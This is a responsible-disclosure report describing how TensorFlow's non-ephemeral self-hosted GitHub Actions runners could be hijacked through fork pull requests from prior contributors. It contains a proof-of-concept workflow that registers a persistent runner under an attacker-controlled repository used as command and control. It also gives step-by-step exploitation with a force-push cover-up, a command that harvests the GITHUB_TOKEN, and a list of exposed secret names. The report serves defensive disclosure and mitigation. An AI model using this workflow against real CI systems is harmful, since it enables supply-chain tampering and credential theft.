Summary:
Tensorflow GitHub Repository Vulnerable to Self-Hosted Runner Attack
Product:
Tensorflow
URL:
https://github.com/tensorflow/tensorflow/
Vulnerability type:
Other
Details
Description:
The Tensorflow/Tensorflow repository utilizes non-ephemeral self-hosted runners to execute
workflows. The Tensorflow/Tensorflow also has the default workflow execution setting of
only requiring approval to run workflows from fork pull requests if the user is a first time contributor. It is possible for anyone who is a contributor to Tensorflow (meaning they have previously submitted a PR that was approved and merged) to modify a workflow in their fork and configure it to run on the self-hosted runners attached to Tensorflow/Tensorflow. This means that members of the public can become contributors and that requiring someone to be a contributor is not a sufficient security boundary to prevent a motivated attacker.
This is due to little known functionality in GitHub where a workflow that runs on the
pull_request
trigger from
a fork PR uses the workflow file from the fork, not the PR base. This means an attacker can alter a workflow to run custom code on a self-hosted runner. For this reason, GitHub strongly recommends avoiding the use of self-hosted
runners on public repositories (
https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners#self-hosted-runner-security
)
This workflow can be used to obtain persistence on the self-hosted runner and
steal secrets (including a
GITHUB_TOKEN
with full write permissions) from or tamper with subsequent builds. Depending on the network positioning of the runner, an attacker could conduct on-host privilege escalation and move laterally within Google's network or cloud environment.
Exploitation Conditions
For this vulnerability to be valid, the repository must have the following:
Approval Not Required for Contributors to run Fork PR Workflows
The default setting for workflow execution from fork PRs is to require
approval only for accounts that have
not
previously contributed to the repository.
There is an option to allow workflow approval for all Fork PRs,
including previous contributors, but does not appear to be enabled.
The proof for this is that pull requests from previous contributors did not
require approval for their workflows on the
trigger to execute.
See
contributor_pr.jpg
and
contributor_pr_exec.jpg
for an example of this.
As of writing Tensorflow/Tensorflow, has
3410
contributors.
Use of Non-Ephemeral Self-Hosted Runners
The repository uses non-ephemeral self-hosted runners to run ARM64 Linux CI builds.
This appears to be the case after inspecting the runner name and machine name
in the workflow run logs. Since the runners are non-ephemeral, a malicious
actor can fork off a process on the runner that continues to run after their job finishes.
A closer inspection of the run logs revealed that the workflows on ARM64 Linux
runners have a
Stop old running containers (if any)
step. In some cases, this
step reveals old images that are cleaned. This means that the runner is
non-ephemeral.
non_ephemeral_proof.jpg
for an example.
We determined that these agents exist by using a slightly modified version of
https://github.com/praetorian-inc/gato
that pulled a large set of workflow run logs and
scanned for unique machine name/runner names.
Exploitation Path
Since the fork workflow will not have a
with write permissions, an attackers
goal will be to establish persistence on the self-hosted runner to gain
access to secrets, tamper with builds or move laterally to other Google systems.
This is possible by running code in the background and passing the
RUNNER_TRACKING_ID
set to 0 as an environment variable.
One easy way to obtain persistence is to install
another
self-hosted runner and connect it to a private repository. This will use GitHub as C2 and bypass EDR protections that may be on the host.
The runner can then be tasked to execute additional commands. Below is a proof-of-concept workflow file to install a self-hosted runner on the Tensorflow ARM64 self-hosted runner and run it in the background.
name: SH Runner POC
on:
jobs:
unit-tests:
runs-on: [self-hosted, linux, ARM64]
steps:
- uses: actions/checkout@v3
- name: unit-tests
continue-on-error: true
run: |
C2_REPO=Amb1guousRaccoon/functionality
INSTALL_DIR="/home/ubuntu/.actions-runner"
REG_TOKEN=<SH_RUNNER_INSTALL_TOKEN>
mkdir $INSTALL_DIR && cd $INSTALL_DIR
curl -o actions-runner-linux-arm64-2.307.1.tar.gz -L https://github.com/actions/runner/releases/download/v2.307.1/actions-runner-linux-arm64-2.307.1.tar.gz
tar xzf ./actions-runner-linux-arm64-2.307.1.tar.gz
./config.sh --url https://github.com/$C2_REPO --unattended --token $REG_TOKEN --name "tf_persistence"
rm actions-runner-linux-arm64-2.307.1.tar.gz
export RUNNER_TRACKING_ID=0 && nohup ./run.sh &
Steps To Reproduce:
We did not conduct this attack because it could disrupt Google systems or demonstrate that the vulnerability is present for threat actors. Additionally, Mandiant, now Google, is a client of Praetorian, so we opted to disclose this with a detailed write up instead of overtly demonstrating the vulnerability.
This can be reproduced by using any account that is a contributor to
Tensorflow/Tensorflow
. The Google security team can create a new account, approve a small PR (such as a one-character readme change), and then use that account to reproduce this vulnerability. Alternatively, we are happy to conduct this demonstration with explicit permission.
Step 1
Create a legitimate pull request for a slight change to the
repository (such as a typo fix) and wait for it to be approved and merged.
Step 2
Create a fork of the repository. Within the fork, remove all existing workflows that run on the
trigger.
Step 3
Add a new workflow file to deploy persistence on the build agent. The proof of concept provided in the report demonstrates a payload that installs a
new
self hosted runner on the existing runner. This will allow persistence and evade EDR and any firewall restrictions that might be in place.
Step 4
Create a draft pull request. This will prevent a request from being sent to codeowners from the change to the workflow yaml file.
Step 5
If the fork PR settings are set to the default value of not requiring approval for previous contributors, the workflow will execute, fork off a process, and exit.
Step 6
Force push the code in the draft PR back to the main commit. This will close the PR and hide obvious indications of malicious activity.
git reset --soft HEAD~1
git push --force
Step 7
Wait for another build not from a fork PR to execute on the runner. This can be done by observing the TensorFlow actions run logs. The new self-hosted runner agent will be active while other builds run. A simple workflow can be added to the C2 repository to run a single command on the
workflow_dispatch
Run a command to steal the
from the runner's working directory:
find /home/ubuntu/actions-runner/_work -type f -name config | xargs cat
NOTE
: The GITHUB_TOKEN is only valid for the duration of a build. If other builds are very short, then the
must be used immediately after stealing. However, it does not impact what an attacker can do with it.
Immediate Mitigation Steps
The most immediate way to mitigate this issue is to take the following steps:
Require approval to run workflows on the
trigger for all outside fork PRs, even if they are contributors.
Move the self-hosted runner group from the repository to the
tensorflow
organization,
and configure the group to only run on specific workflows that have already been committed to the main branch. (
https://docs.github.com/en/enterprise-cloud@latest/actions/hosting-your-own-runners/managing-self-hosted-runners/managing-access-to-self-hosted-runners-using-groups#changing-which-workflows-can-access-an-organization-runner-group
) this will prevent the runner from picking up
a workflow execution from a fork PR, even if a maintainer with write access approves the workflow.
Longer term, ensure that only ephemeral self-hosted runners (1 build, 1 clean runner) are used for public repository builds.
References
https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/
https://github.com/nikitastupin/pwnhub/blob/main/writings/github-token.md
https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/
https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution
https://slsa.dev/spec/v1.0/verifying-systems
Attack scenario
Impact
The impact from this vulnerability depends on the permission levels of the
assigned to subsequent builds, branch protection settings
in place for the Tensorflow/Tensorflow repository, and the network positioning of the build machine.
In this case, the machine ran scheduled builds with a
with extensive write permissions. See
tf_write_perms.png
to see the token permissions.
This token would be valid for the life of that particular build. See
arm_ci_length.jpg
for an example of how long these other builds are.
Tensorflow uses branch portections for the
master
nightly
branches;
however, feature branches are not subject to branch protection. An attacker
could try to commit a change to a feature branch that is under development by a
Tensorflow maintainer.
Additionally, the
could be used to tamper releases published on
GitHub at
https://github.com/tensorflow/tensorflow/releases/
. The source within
the tar.gz and zip files could be replaced with malicious code.
Secret Disclosure
An attacker could obtain the following secrets from the repository by using the stolen
to create a feature branch with malicious code, and then issuing a
event to it.
The code within that branch could then dump secrets from the GitHub hosted
runner's memory or monitor subsequent steps for secrets. The AWS PyPi token
could be stolen directly from a runner since it is used in workflows that also
run on the ARM64 linux runners.
GCP_CREDS
AWS_PYPI_ACCOUNT_TOKEN
JENKINS_TOKEN
DOCKERHUB_USERNAME
DOCKERHUB_TOKEN
Persistence on Build Servers
Tensorflow uses several non-ephemereal runners for ARM64 Linux CI. Some of the
runner names are:
runner6
runner7
runner9
runner13
runner15
An attacker might be able to conduct lateral movement depending any service
account permissions or network targets these build runners might have access to.